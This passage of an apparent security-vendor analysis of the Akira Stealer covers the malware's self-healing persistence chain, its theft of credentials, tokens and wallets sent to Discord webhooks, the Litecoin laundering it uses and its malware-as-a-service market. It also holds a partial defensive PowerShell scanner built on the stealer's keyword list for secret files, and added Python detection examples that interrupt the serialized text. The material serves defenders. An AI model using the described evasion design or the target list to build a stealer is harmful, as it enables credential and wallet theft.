Breakdown",[12,14785,47],{},[6086,14787,14788,14814,14827,14858,14876],{},[1258,14789,14790,14795,14797,14798,14801,14802,14804,14805,14807,14808,14810,14811,14813],{},[251,14791,14792,14793,1289],{},"Persistence Anchor (",[63,14794,4614],{},[63,14796,4614],{}," acts as the foundational foothold. 
It is typically dropped into a Windows user startup location, such as ",[63,14799,14800],{},"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup",", or registered via ",[63,14803,5665],{},". Its job is simple but critical: ensure ",[63,14806,4618],{}," is present and launch it silently during user logon. If ",[63,14809,4618],{}," is missing, it re-extracts the archive ",[63,14812,5831],{}," (located in a temp folder or dropped anew), regenerating the full Electron app structure.",[1258,14815,14816,14821,14823,14824,14826],{},[251,14817,14818,14819,1289],{},"Bridge Loader (",[63,14820,4618],{},[63,14822,4618],{}," is the Electron-wrapped Node.js application. It doesn’t expose any GUI and operates entirely in the background. Upon execution, it runs the embedded JavaScript logic within ",[63,14825,5068],{},", using Node.js as a runtime environment. This abstraction layer decouples the core logic from the PE stub, helping to evade traditional analysis.",[1258,14828,14829,14834,14835,14837,14838],{},[251,14830,14831,14832,1289],{},"Execution Orchestrator (",[63,14833,6810],{},"\nEmbedded within ",[63,14836,5068],{},", this is the true controller of the infection chain. Its key functions include:",[1255,14839,14840,14846,14849],{},[1258,14841,14842,14843,14845],{},"Checking for the presence of ",[63,14844,4614],{}," and redeploying it if missing",[1258,14847,14848],{},"Dynamically injecting runtime configuration: webhook URLs, C2 addresses, tokens",[1258,14850,14851,14852,14854,14855,14857],{},"Either invoking the already-present Python payload (",[63,14853,4622],{},") or downloading it as part of a ZIP bundle (e.g., ",[63,14856,6874],{},") from attacker-controlled infrastructure",[1258,14859,14860,14865,14866,14868,14869,14871,14872,14875],{},[251,14861,14862,14863,1289],{},"Payload Execution (",[63,14864,4622],{},"\nOnce triggered, ",[63,14867,4622],{}," executes in memory via ",[63,14870,4593],{},". 
It systematically collects saved credentials, cookies, Discord tokens, browser session data, and cryptocurrency wallet extensions. The data is staged in a ZIP archive and exfiltrated via HTTPS — commonly to Discord webhooks, but fallback APIs like ",[63,14873,14874],{},"gofile.io"," or custom C2 endpoints have also been observed.",[1258,14877,14878,14881,14882,14884,14885,14887,14888,14890,14891,14893,14894,14896],{},[251,14879,14880],{},"Loop Integrity and Self-Healing","\nThe design is circular. If ",[63,14883,4614],{}," is deleted, it will be redeployed. If ",[63,14886,4618],{}," is missing, ",[63,14889,4614],{}," re-extracts it from ",[63,14892,5831],{},". If ",[63,14895,4622],{}," is deleted, it is re-obtained by the JavaScript layer. This interdependency makes the malware resilient and capable of reconstructing its execution chain from virtually any surviving fragment.",[12,14898,14899,14900,14903],{},"This architecture is not just modular — it’s ",[251,14901,14902],{},"self-sustaining",", deliberately engineered for stealth, flexibility, and long-term survivability in target environments.",[41,14905,14907],{"id":14906},"_82-why-this-is-noteworthy","8.2 Why This Is Noteworthy",[12,14909,47],{},[12,14911,14912,14913,1014],{},"The campaign’s architectural design reflects a level of sophistication not typically seen in commodity infostealers. It goes beyond simple multi-stage loaders — this is malware engineered for ",[251,14914,14915],{},"operational resilience, stealth, and automation",[12,14917,14918],{},[251,14919,14920],{},"Key Characteristics",[1255,14922,14923,14929,14966,14986],{},[1258,14924,14925,14928],{},[251,14926,14927],{},"Full Autonomy","\nOnce deployed, the malware requires no user interaction or external reactivation. 
It acts like a malicious microservice — orchestrating its own persistence, payload execution, and repair routines without external control.",[1258,14930,14931,14934,14935],{},[251,14932,14933],{},"Multi-Language Execution Stack","\nThe toolchain integrates:",[1255,14936,14937,14946,14952,14958],{},[1258,14938,14939,1403,14942,805,14944,1289],{},[251,14940,14941],{},"PE Binaries",[63,14943,4614],{},[63,14945,4618],{},[1258,14947,14948,14951],{},[251,14949,14950],{},"Node.js / JavaScript"," (via Electron)",[1258,14953,14954,14957],{},[251,14955,14956],{},"PowerShell"," (used for obfuscated payload relay)",[1258,14959,14960,1403,14963,14965],{},[251,14961,14962],{},"Python",[63,14964,4622],{},", executed as memory-resident stealer)\nThis layered composition makes it harder to profile, fingerprint, and analyze using conventional static tools.",[1258,14967,14968,14971,14972],{},[251,14969,14970],{},"Defense Evasion by Design","\nEvery component is encoded, encrypted, or dynamically injected:",[1255,14973,14974,14977,14980,14983],{},[1258,14975,14976],{},"Base64 PowerShell relay",[1258,14978,14979],{},"AES-encrypted and GZIP-compressed Python core",[1258,14981,14982],{},"Obfuscated JavaScript with runtime token injection",[1258,14984,14985],{},"Self-healing behavior that frustrates partial removal",[1258,14987,14988,14991,14992,14893,14995,14997,14998,15000],{},[251,14989,14990],{},"No Single Point of Failure","\nThe malware’s self-repair logic ensures that ",[251,14993,14994],{},"removal of a single component is insufficient",[63,14996,4614],{}," is removed, the info stealer recreates it. 
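The loop described in 8.1 is far easier to catch as a process lineage than as a set of file names, and the repair step gives itself away as a file re-created by that lineage shortly after it was deleted. The Python below is an added example, not code from the original post or from glueckkanja tooling: it rebuilds parent/child ancestry from constructed process-creation events, matches it against the ordered loader chain, and correlates a deletion with a re-creation by a chain member. Updater.exe is named in the IOC table; bridge.exe (the Electron wrapper) and python.exe (the payload host) are assumed placeholder names, as are every PID, timestamp and path.

```python
"""Chain-based detection for a self-healing loader loop.

Added example, not the original post's code. It rebuilds parent/child lineage
from process-creation telemetry, matches it against the ordered loader chain,
and correlates a file deletion with its re-creation by a chain member.
"""
from dataclasses import dataclass

# Ordered loader chain, root to leaf. Updater.exe is named in the IOC table;
# bridge.exe (Electron wrapper) and python.exe (payload host) are ASSUMED names.
CHAIN = ("updater.exe", "bridge.exe", "powershell.exe", "python.exe")


@dataclass(frozen=True)
class ProcEvent:
    ts: int      # seconds since start of capture
    pid: int
    ppid: int
    image: str   # image file name, lower-case


@dataclass(frozen=True)
class FileEvent:
    ts: int
    pid: int     # process that performed the action
    action: str  # "delete" or "create"
    path: str


def ancestors(pid, procs):
    """pids from `pid` up to the root (inclusive), leaf-to-root order; cycle-safe."""
    out = []
    while pid in procs and pid not in out:
        out.append(pid)
        pid = procs[pid].ppid
    return out


def is_subsequence(pattern, seq):
    """True if `pattern` occurs in order inside `seq`; gaps (e.g. an extra
    cmd.exe hop between stages) are allowed."""
    it = iter(seq)
    return all(any(p == s for s in it) for p in pattern)


def find_chains(proc_events):
    """(leaf_pid, root-first image lineage) for every CHAIN[-1] process whose
    ancestry contains CHAIN in order."""
    procs = {e.pid: e for e in proc_events}
    hits = []
    for e in proc_events:
        if e.image != CHAIN[-1]:
            continue
        lin = [procs[p].image for p in reversed(ancestors(e.pid, procs))]
        if is_subsequence(CHAIN, lin):
            hits.append((e.pid, lin))
    return hits


def find_self_healing(proc_events, file_events, window=60):
    """Paths re-created by a chain member within `window` seconds of deletion.
    Returns (path, deleter_pid, recreator_pid, seconds_between) tuples."""
    procs = {e.pid: e for e in proc_events}
    members = set()
    for leaf_pid, _ in find_chains(proc_events):
        members.update(ancestors(leaf_pid, procs))
    creates = [f for f in file_events if f.action == "create"]
    flagged = []
    for d in (f for f in file_events if f.action == "delete"):
        for c in creates:
            if (c.path.lower() == d.path.lower() and c.pid in members
                    and 0 <= c.ts - d.ts <= window):
                flagged.append((d.path, d.pid, c.pid, c.ts - d.ts))
    return flagged


# Constructed sample telemetry (not a real capture); PIDs and paths are made up.
STARTUP = (r"C:\Users\alice\AppData\Roaming\Microsoft\Windows"
           r"\Start Menu\Programs\Startup\Updater.exe")
PROCS = [
    ProcEvent(0, 100, 1, "explorer.exe"),
    ProcEvent(1, 101, 100, "updater.exe"),
    ProcEvent(2, 102, 101, "bridge.exe"),
    ProcEvent(3, 103, 102, "powershell.exe"),
    ProcEvent(4, 104, 103, "python.exe"),
    ProcEvent(5, 200, 1, "explorer.exe"),   # benign: a developer's interpreter
    ProcEvent(6, 201, 200, "python.exe"),
]
FILES = [
    FileEvent(30, 999, "delete", STARTUP),  # analyst removes the anchor ...
    FileEvent(35, 103, "create", STARTUP),  # ... and the chain puts it back
    FileEvent(40, 999, "delete", r"C:\Temp\notes.txt"),
    FileEvent(41, 999, "create", r"C:\Temp\notes.txt"),  # unrelated churn
]

if __name__ == "__main__":
    for pid, lin in find_chains(PROCS):
        print(f"chain leaf pid={pid}: {' -> '.join(lin)}")
    for path, dpid, cpid, dt in find_self_healing(PROCS, FILES):
        print(f"self-healing: {path} deleted by pid {dpid}, re-created by pid {cpid} {dt}s later")
```

The benign python.exe under a plain explorer.exe parent is not flagged, and an extra hop such as cmd.exe between stages still matches because the chain is checked as an ordered subsequence rather than an exact path. In Defender for Endpoint the same two checks map onto DeviceProcessEvents (walk InitiatingProcessId upwards) and DeviceFileEvents (a FileDeleted followed by a FileCreated on the same path from a process inside that lineage).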
If ",[63,14999,4622],{}," is deleted, it is redownloaded and redeployed by the JavaScript controller.",[12,15002,15003,15004,15007],{},"In short, the malware behaves more like a ",[251,15005,15006],{},"distributed system"," than a typical payload — one that prioritizes survivability, modularity, and stealth.",[12,15009,15010,15011,15014],{},"This elevates the threat from an opportunistic attack to a ",[251,15012,15013],{},"resilient, adaptive platform"," — requiring defenders to match its complexity with equally layered detection and response strategies.",[41,15016,15018],{"id":15017},"_83-implications-for-blue-teams","8.3 Implications for Blue Teams",[12,15020,47],{},[12,15022,15023],{},"For defenders and CSOC operators, this kind of architecture raises the bar:",[1255,15025,15026,15032,15047],{},[1258,15027,15028,15031],{},[251,15029,15030],{},"Partial cleanup is ineffective",". All nodes must be identified and removed simultaneously.",[1258,15033,15034,15037,15038,15040,15041,15040,15043,15040,15045,1014],{},[251,15035,15036],{},"Defender for Endpoint correlation"," is essential. Analysts must trace full chains: from ",[63,15039,4614],{}," → ",[63,15042,5123],{},[63,15044,5218],{},[63,15046,4593],{},[1258,15048,15049,15052],{},[251,15050,15051],{},"IOC-free persistence"," means memory-based heuristics, telemetry baselining, and chain-based detection are key.",[12,15054,15055,15056,15059],{},"This isn’t just a stealer. It’s a ",[251,15057,15058],{},"resilient malware platform"," — behaving more like a distributed system than a simple threat. And that’s exactly what makes it both impressive and dangerous.",[25,15061,15063],{"id":15062},"_9-blockchain-tracking-and-analysis","9. 
Blockchain Tracking and Analysis",[12,15065,31],{},[41,15067,15069],{"id":15068},"_91-tracing-fund-distribution-in-a-litecoin-based-malware-campaign","9.1 Tracing Fund Distribution in a Litecoin-Based Malware Campaign",[12,15071,47],{},[12,15073,15074,15075,15078],{},"During the reverse engineering phase of this malware campaign, we extracted multiple hardcoded wallet addresses used by the stealer for cryptocurrency exfiltration. By following the on-chain activity of these Litecoin wallets, we were able to uncover patterns indicative of deliberate money laundering tactics. The attacker-controlled wallet ",[63,15076,15077],{},"LW6EopiZ..."," acts as a central aggregation point. Funds stolen from multiple victims are funneled into this address, after which they are rapidly redistributed across multiple new addresses.",[12,15080,15081],{},"The behavior seen here is representative of a classic split-transfer pattern used in crypto tumbling or mixing operations. In each instance, the full incoming balance is divided into two roughly proportional outbound transactions, each sent to a different wallet. This strategy is designed to hinder address clustering and chain tracing by obfuscating the provenance of funds. It’s an effective tactic to evade detection by automated blockchain analytics and threat intelligence platforms.",[12,15083,15084],{},"This laundering behavior leverages a combination of transaction timing, precise value splitting, and address reuse minimization to bypass heuristics commonly applied by clustering algorithms like those used in GraphSense, Chainalysis, or TRM Labs. The overall intent is to create high-entropy transactional flows, which confuse attribution and disrupt linkability, especially when the funds are eventually bridged across other assets or swapped into privacy-focused coins.",[12,15086,15087],{},"In the example below, we show a structured subset of this behavior. The incoming transactions represent distinct victim transfers. 
These values are then perfectly mapped to outbound flows, showing the coins being \"washed\" through fast, predictable, and algorithmically split payouts.",[417,15089,420,15092],{"className":15090,"style":8673},[15091],"font-size-1",[438,15093,15094,420,15117,420,15149,420,15177,420,15206],{},[426,15095,424,15096,424,15100,424,15104,424,15107,424,15111,424,15114,420],{},[430,15097,15099],{"style":15098},"text-align: left; width: 14%;","Input Source",[430,15101,15103],{"style":15102},"text-align: left; width: 12%;","Input Date",[430,15105,15106],{"style":15098},"Amount In (LTC)",[430,15108,15110],{"style":15109},"text-align: left; width: 20%;","→ Attacker Wallet",[430,15112,15113],{"style":10293},"Output Addresses",[430,15115,15116],{"style":8841},"Total Out (LTC)",[426,15118,424,15119,424,15122,424,15125,424,15128,424,15134,424,15147,420],{},[443,15120,15121],{},"Input_1",[443,15123,15124],{},"2024-09-21",[443,15126,15127],{},"0.25339198",[443,15129,428,15130,424],{},[102,15131,15133],{"title":15132},"LLQtaBnSAFpCFUw5cXRRka7Nvtrs4Up9bH","LLQtaBnSAF...",[443,15135,15136,15137,15140,15141,15136,15143,15146],{},"\n      - ",[63,15138,15139],{},"LZmHkgkED..."," (0.15579078, 2024-09-26)",[531,15142],{},[63,15144,15145],{},"M8JpDsw5H7..."," (0.09760120, 2024-09-26)\n    ",[443,15148,15127],{},[426,15150,424,15151,424,15154,424,15157,424,15160,424,15164,424,15175,420],{"style":8697},[443,15152,15153],{},"Input_2",[443,15155,15156],{},"2024-04-16",[443,15158,15159],{},"1.09976044",[443,15161,428,15162,424],{},[102,15163,15133],{"title":15132},[443,15165,15136,15166,15169,15170,15136,15172,15174],{},[63,15167,15168],{},"LgWrCAF8ED..."," (0.84304664, 2024-06-13)",[531,15171],{},[63,15173,15168],{}," (0.25671380, 2024-06-13)\n    
",[443,15176,15159],{},[426,15178,424,15179,424,15182,424,15185,424,15188,424,15192,424,15204,420],{},[443,15180,15181],{},"Input_3",[443,15183,15184],{},"2024-03-06",[443,15186,15187],{},"0.77089346",[443,15189,428,15190,424],{},[102,15191,15133],{"title":15132},[443,15193,15136,15194,15197,15198,15136,15200,15203],{},[63,15195,15196],{},"LZL3wQcSRP..."," (0.38544673, 2024-03-04)",[531,15199],{},[63,15201,15202],{},"M8kiBpVHG3..."," (0.38544673, 2024-03-04)\n    ",[443,15205,15187],{},[426,15207,424,15208,424,15211,424,15213,424,15215,424,15219,424,15229,420],{"style":8697},[443,15209,15210],{},"Input_4",[443,15212,15184],{},[443,15214,15187],{},[443,15216,428,15217,424],{},[102,15218,15133],{"title":15132},[443,15220,15136,15221,15197,15224,15136,15226,15203],{},[63,15222,15223],{},"LUFLTrqYpix...",[531,15225],{},[63,15227,15228],{},"La22dfH9eM...",[443,15230,15187],{},[52,15232],{"className":15233},[4854,4855],[25,15235,15237],{"id":15236},"_10-inside-the-akira-ecosystem-commercialized-cybercrime-infrastructure","10. Inside the Akira Ecosystem – Commercialized Cybercrime Infrastructure",[12,15239,31],{},[12,15241,15242],{},"Akira is not just a stealer—it’s the centerpiece of a thriving underground ecosystem designed to simplify, scale, and monetize cybercrime.",[41,15244,15246],{"id":15245},"_101-a-plug-and-play-ecosystem-for-threat-actors","10.1 A Plug-and-Play Ecosystem for Threat Actors",[12,15248,47],{},[12,15250,15251],{},"The Akira ecosystem exemplifies the evolution of cybercrime into a professionalized, service-driven economy. 
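The split-transfer pattern tabulated in section 9.1 can be checked mechanically rather than by eye. The Python below is an added example, not code from the original post or from any blockchain-analytics vendor: it matches each inbound payment to a hub address against later outbound payments whose amounts sum to it, reports the fan-out, delay and proportion, and can absorb a network fee. The amounts of victim_1..victim_3 and their outbound pairs are copied from the table above and the dates of the first two rows are the table's; the hub, victim and output labels (the table truncates the real addresses), the third row's dates and the fourth, fee-shortened row are constructed.

```python
"""Split-transfer (fan-out) detection around a laundering hub address.

Added example, not from the original post or any vendor tool. Amounts are
handled as integer litoshi (1e-8 LTC) so that sums are exact.
"""
from dataclasses import dataclass
from datetime import date
from itertools import combinations

LITOSHI = 10 ** 8


@dataclass(frozen=True)
class Payment:
    day: date
    src: str
    dst: str
    amount: int  # litoshi


def to_litoshi(s):
    """'0.25339198' -> 25339198 without going through float."""
    whole, _, frac = s.partition(".")
    return int(whole or "0") * LITOSHI + int((frac + "0" * 8)[:8])


def fmt(v):
    return f"{v // LITOSHI}.{v % LITOSHI:08d}"


def find_splits(payments, hub, max_parts=3, tolerance=0, max_days=120):
    """For every inbound payment to `hub`, find a set of at most `max_parts`
    later outbound payments from `hub` whose amounts sum to the inbound amount
    (within `tolerance` litoshi, to absorb a fee); smallest set size wins.
    Each outbound payment is consumed at most once."""
    inbound = sorted((p for p in payments if p.dst == hub), key=lambda p: p.day)
    outbound = sorted((p for p in payments if p.src == hub), key=lambda p: p.day)
    used, results = set(), []
    for inc in inbound:
        cands = [o for o in outbound
                 if o not in used and 0 <= (o.day - inc.day).days <= max_days]
        match = None
        for k in range(1, max_parts + 1):
            for combo in combinations(cands, k):
                if abs(sum(o.amount for o in combo) - inc.amount) <= tolerance:
                    match = combo
                    break
            if match:
                break
        if match is None:
            results.append({"inbound": inc, "parts": (), "matched": False})
            continue
        used.update(match)
        largest = max(o.amount for o in match)
        results.append({
            "inbound": inc,
            "parts": match,
            "matched": True,
            "delay_days": max((o.day - inc.day).days for o in match),
            "largest_share": largest / inc.amount,
            "distinct_dsts": len({o.dst for o in match}),
        })
    return results


def split_ratio(results):
    """Fraction of matched inbound payments fanned out to 2+ distinct addresses."""
    matched = [r for r in results if r["matched"]]
    fanned = [r for r in matched if r["distinct_dsts"] >= 2]
    return len(fanned) / len(matched) if matched else 0.0


def pay(day, src, dst, amount):
    return Payment(date.fromisoformat(day), src, dst, to_litoshi(amount))


# Constructed sample. HUB stands for the aggregation wallet in the table; the
# victim_4 row (1000 litoshi short on the way out) is added to show the
# unmatched path and the fee tolerance.
HUB = "HUB"
SAMPLE = [
    pay("2024-09-21", "victim_1", HUB, "0.25339198"),
    pay("2024-09-26", HUB, "out_1a", "0.15579078"),
    pay("2024-09-26", HUB, "out_1b", "0.09760120"),
    pay("2024-04-16", "victim_2", HUB, "1.09976044"),
    pay("2024-06-13", HUB, "out_2a", "0.84304664"),
    pay("2024-06-13", HUB, "out_2b", "0.25671380"),
    pay("2024-03-06", "victim_3", HUB, "0.77089346"),
    pay("2024-03-08", HUB, "out_3a", "0.38544673"),
    pay("2024-03-08", HUB, "out_3b", "0.38544673"),
    pay("2024-10-01", "victim_4", HUB, "0.50000000"),
    pay("2024-10-02", HUB, "out_4a", "0.30000000"),
    pay("2024-10-02", HUB, "out_4b", "0.19999000"),  # fee-shortened pair
]

if __name__ == "__main__":
    for r in find_splits(SAMPLE, HUB, tolerance=2000):
        inc = r["inbound"]
        parts = ", ".join(f"{o.dst} {fmt(o.amount)}" for o in r["parts"]) or "(unmatched)"
        print(f"{inc.src} {fmt(inc.amount)} on {inc.day} -> {parts}")
```

With tolerance 0 the three table rows reconcile exactly and the fee-shortened row stays unmatched; a tolerance of a few thousand litoshi matches it too. A largest_share near 0.5 with two distinct destinations is the even split the text describes, and split_ratio over a whole hub's history is the number to put next to the clustering heuristics it is designed to defeat. Raise max_parts when a hub fans out into more than two addresses; the subset search is exponential in it, so keep the date window tight.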
It includes:",[1255,15253,15254,15263,15269,15275,15281],{},[1258,15255,15256,15259,15260,1289],{},[251,15257,15258],{},"Builder Bots"," for on-demand payload generation (e.g., ",[63,15261,15262],{},"@AkiraRedBot",[1258,15264,15265,15268],{},[251,15266,15267],{},"Telegram channels"," for updates, feature requests, and customer support",[1258,15270,15271,15274],{},[251,15272,15273],{},"Automated licensing and payment handling",", often via direct messages or anonymous e-commerce platforms like Sellix",[1258,15276,15277,15280],{},[251,15278,15279],{},"Bundled modules"," such as clipboard hijackers, Discord token loggers, browser data stealers, and even ransomware add-ons",[1258,15282,15283,15286],{},[251,15284,15285],{},"Customizable payloads"," with configuration interfaces allowing toggles, webhook input, and icon branding",[12,15288,15289],{},[2772,15290],{"alt":15291,"src":15292},"Akira Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797420/blog/pics/akira-stealer-v2.jpg",[41,15294,15296],{"id":15295},"_102-commercialization-of-cybercrime","10.2 Commercialization of Cybercrime",[12,15298,47],{},[12,15300,15301],{},"Akira's structure reflects a broader movement toward \"Malware-as-a-Service\" (MaaS), where:",[1255,15303,15304,15310,15316,15322],{},[1258,15305,15306,15309],{},[251,15307,15308],{},"No deep technical skill"," is required to launch attacks",[1258,15311,15312,15315],{},[251,15313,15314],{},"Low entry costs"," ($75 for 3 months, $150 for lifetime)",[1258,15317,15318,15321],{},[251,15319,15320],{},"Instant support and documentation"," through Telegram",[1258,15323,15324,15327],{},[251,15325,15326],{},"Community contributions"," regularly extend Akira with scripts and feature suggestions",[12,15329,15330],{},"This ecosystem mirrors legitimate SaaS business models — with changelogs, UX improvements, pricing tiers, and upsells.",[12,15332,15333],{},[2772,15334],{"alt":15335,"src":15336},"Akira 
Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797061/blog/pics/akira-stealer.jpg",[41,15338,15340],{"id":15339},"_103-beyond-the-stealer-the-ecosystems-components","10.3 Beyond the Stealer – The Ecosystem's Components",[12,15342,47],{},[12,15344,5721,15345,15347],{},[63,15346,4622],{}," is the heart of many attacks, the ecosystem provides a full chain:",[1255,15349,15350,15353,15356,15359,15362],{},[1258,15351,15352],{},"Obfuscation tools like PyInstaller wrappers",[1258,15354,15355],{},"File binders for coupling malicious payloads with benign software",[1258,15357,15358],{},"Compilers, crypters, and runtime polymorphism",[1258,15360,15361],{},"Hosting mirrors for payload delivery and exfiltration (e.g., GoFile, AnonFiles)",[1258,15363,15364],{},"Data management bots that summarize stolen credentials and hardware profiles",[12,15366,15367],{},[2772,15368],{"alt":15369,"src":15370},"Akira Bot","https://res.cloudinary.com/c4a8/image/upload/v1749797107/blog/pics/akira-bot.jpg",[25,15372,15374],{"id":15373},"_11-akira-stealer-quickcheck-affected-files","11. Akira Stealer QuickCheck affected files",[12,15376,31],{},[41,15378,15380],{"id":15379},"_111-what-is-this-for","11.1 What Is This For?",[12,15382,47],{},[12,15384,15385,15386,805,15389,805,15392,6190,15395,15398],{},"After a suspected Akira Stealer infection, it's critical to know immediately which files on your system were at risk of exfiltration. 
The QuickCheck PowerShell script outlined below replicates Akira's exact search logic: it scans the user's ",[251,15387,15388],{},"Desktop",[251,15390,15391],{},"Documents",[251,15393,15394],{},"Downloads",[251,15396,15397],{},"OneDrive"," folders for files that:",[1255,15400,15401,15417,15420],{},[1258,15402,15403,15404,805,15407,805,15410,15413,15414],{},"Contain sensitive keywords in their filename, such as ",[63,15405,15406],{},"password",[63,15408,15409],{},"wallet",[63,15411,15412],{},"backup",", or ",[63,15415,15416],{},"token",[1258,15418,15419],{},"Have specific extensions commonly targeted (.txt, .docx, .pdf, .jpg, etc.)",[1258,15421,15422],{},"Are under the 2 MB size limit imposed by the malware",[12,15424,15425,15426,15429],{},"While QuickCheck offers a rapid overview based on Akira Stealer’s internal logic, ",[251,15427,15428],{},"it is not a substitute"," for comprehensive forensic tools or professional incident response. Always follow up with deeper analysis when dealing with confirmed breaches.",[12,15431,15432,15433,805,15436,805,15439,15442,15443,1014],{},"It then presents a sorted table of ",[251,15434,15435],{},"Filename",[251,15437,15438],{},"Relative Path",[251,15440,15441],{},"Size (KB)"," and the ",[251,15444,15445],{},"trigger keyword",[2109,15447,15448],{},[12,15449,15450,15453,15454,15457,15458,15460,15461,15464],{},[251,15451,15452],{},"DISCLAIMER","\nThis tool is provided ",[251,15455,15456],{},"“as is”"," without any warranty of completeness or fitness for a particular purpose. It does ",[251,15459,14701],{}," guarantee detection of ",[251,15462,15463],{},"all"," potentially sensitive files, nor does it replace full malware forensics. Use at your own risk.",[52,15466],{"className":15467},[4854],[41,15469,15471],{"id":15470},"legal-notice","Legal Notice",[12,15473,47],{},[12,15475,15476,15477,15480,15481,15484],{},"This QuickCheck Utility is intended for ",[251,15478,15479],{},"defensive security"," assessments only. 
Any unauthorized scanning or usage on systems you do not own may violate privacy, copyright, or computer misuse laws. glueckkanja AG assumes ",[251,15482,15483],{},"no liability"," for misuse or damages resulting from its use.",[41,15486,15488],{"id":15487},"powershell-script","PowerShell Script",[12,15490,47],{},[56,15492,15494],{"className":5687,"code":15493,"language":5689,"meta":65,"style":65},"\u003C#\n.SYNOPSIS\n    QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n\n.DESCRIPTION\n    Scans Desktop, Documents, Downloads and OneDrive for files that:\n      • Contain one of the defined keywords in their name\n      • Have an allowed file extension\n      • Are not larger than 2 MB\n    Presents the results in a colored, tabular overview.\n\n.NOTES\n    © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n#>\n\n# -------------------------------------\n# 1. Configuration\n# -------------------------------------\n$scanFolders = @(\n    \"$env:USERPROFILE\\Desktop\",\n    \"$env:USERPROFILE\\Documents\",\n    \"$env:USERPROFILE\\Downloads\",\n    \"$env:USERPROFILE\\OneDrive\"\n)\n$keywords   = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n$maxSize    = 2MB\n\n# -------------------------------------\n# 2. 
Scan and Collect Matches\n# -------------------------------------\n$matches = [System.Collections.Generic.List[PSObject]]::new()\n\nforeach ($folder in $scanFolders) {\n    if (-not (Test-Path $folder)) { continue }\n    Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n        # 2.1 Extension filter\n        if ($extensions -notcontains $_.Extension.ToLower()) { return }\n        # 2.2 Size filter\n        if ($_.Length -gt $maxSize) { return }\n\n        # 2.3 Keyword filter: explicit loop to avoid null-method calls\n        $hit = $null\n        foreach ($kw in $keywords) {\n            if ($_.Name.ToLower().Contains($kw)) {\n                $hit = $kw\n                break\n            }\n        }\n        if (-not $hit) { return }\n\n        # 2.4 Build relative path\n        $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n\n        # 2.5 Collect\n        $matches.Add([PSCustomObject]@{\n            FileName    = $_.Name\n            Location    = $rel\n            'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n            Keyword     = $hit\n        })\n    }\n}\n\n# -------------------------------------\n# 3. Display Results\n# -------------------------------------\nclear\nWrite-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\nWrite-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n\nif ($matches.Count -gt 0) {\n    $matches |\n        Sort-Object Location, FileName |\n        Format-Table -AutoSize `\n            @{Label='File';       Expression={$_.FileName}},\n            @{Label='Location';   Expression={$_.Location}},\n            @{Label='Size (KB)';  Expression={$_. 
'Size (KB)'}},\n            @{Label='Keyword';    Expression={$_.Keyword}}\n\n    Write-Host \"`n⚠️  Total potential matches: $($matches.Count)\" -ForegroundColor Yellow\n}\nelse {\n    Write-Host \"✅ No potentially compromised files found.\" -ForegroundColor Green\n}\n\nWrite-Host \"`n© glueckkanja AG · Kaiserstr. 39 · 63065 Offenbach\" -ForegroundColor DarkGray\nWrite-Host \"Disclaimer: This tool offers a high-level scan based on Akira Stealer’s logic; it does not replace full forensic analysis.\" -ForegroundColor DarkGray\n",[63,15495,15496,15501,15506,15511,15515,15520,15525,15530,15535,15540,15545,15549,15554,15559,15564,15568,15573,15578,15582,15587,15592,15597,15602,15607,15611,15616,15621,15626,15630,15634,15639,15643,15648,15652,15657,15662,15667,15672,15677,15682,15687,15691,15696,15701,15706,15711,15716,15721,15726,15731,15736,15740,15745,15750,15754,15759,15764,15769,15774,15779,15784,15789,15794,15798,15802,15806,15811,15815,15820,15825,15830,15834,15839,15844,15849,15854,15859,15864,15869,15875,15880,15886,15891,15897,15903,15908,15913,15919],{"__ignoreMap":65},[102,15497,15498],{"class":104,"line":105},[102,15499,15500],{},"\u003C#\n",[102,15502,15503],{"class":104,"line":111},[102,15504,15505],{},".SYNOPSIS\n",[102,15507,15508],{"class":104,"line":329},[102,15509,15510],{},"    QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n",[102,15512,15513],{"class":104,"line":346},[102,15514,7846],{"emptyLinePlaceholder":2180},[102,15516,15517],{"class":104,"line":650},[102,15518,15519],{},".DESCRIPTION\n",[102,15521,15522],{"class":104,"line":656},[102,15523,15524],{},"    Scans Desktop, Documents, Downloads and OneDrive for files that:\n",[102,15526,15527],{"class":104,"line":662},[102,15528,15529],{},"      • Contain one of the defined keywords in their name\n",[102,15531,15532],{"class":104,"line":668},[102,15533,15534],{},"      • Have an allowed file 
extension\n",[102,15536,15537],{"class":104,"line":674},[102,15538,15539],{},"      • Are not larger than 2 MB\n",[102,15541,15542],{"class":104,"line":680},[102,15543,15544],{},"    Presents the results in a colored, tabular overview.\n",[102,15546,15547],{"class":104,"line":9019},[102,15548,7846],{"emptyLinePlaceholder":2180},[102,15550,15551],{"class":104,"line":9025},[102,15552,15553],{},".NOTES\n",[102,15555,15556],{"class":104,"line":9031},[102,15557,15558],{},"    © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n",[102,15560,15561],{"class":104,"line":9037},[102,15562,15563],{},"#>\n",[102,15565,15566],{"class":104,"line":9043},[102,15567,7846],{"emptyLinePlaceholder":2180},[102,15569,15570],{"class":104,"line":9049},[102,15571,15572],{},"# -------------------------------------\n",[102,15574,15575],{"class":104,"line":9055},[102,15576,15577],{},"# 1. Configuration\n",[102,15579,15580],{"class":104,"line":9061},[102,15581,15572],{},[102,15583,15584],{"class":104,"line":9067},[102,15585,15586],{},"$scanFolders = @(\n",[102,15588,15589],{"class":104,"line":9073},[102,15590,15591],{},"    \"$env:USERPROFILE\\Desktop\",\n",[102,15593,15594],{"class":104,"line":9079},[102,15595,15596],{},"    \"$env:USERPROFILE\\Documents\",\n",[102,15598,15599],{"class":104,"line":9085},[102,15600,15601],{},"    \"$env:USERPROFILE\\Downloads\",\n",[102,15603,15604],{"class":104,"line":9091},[102,15605,15606],{},"    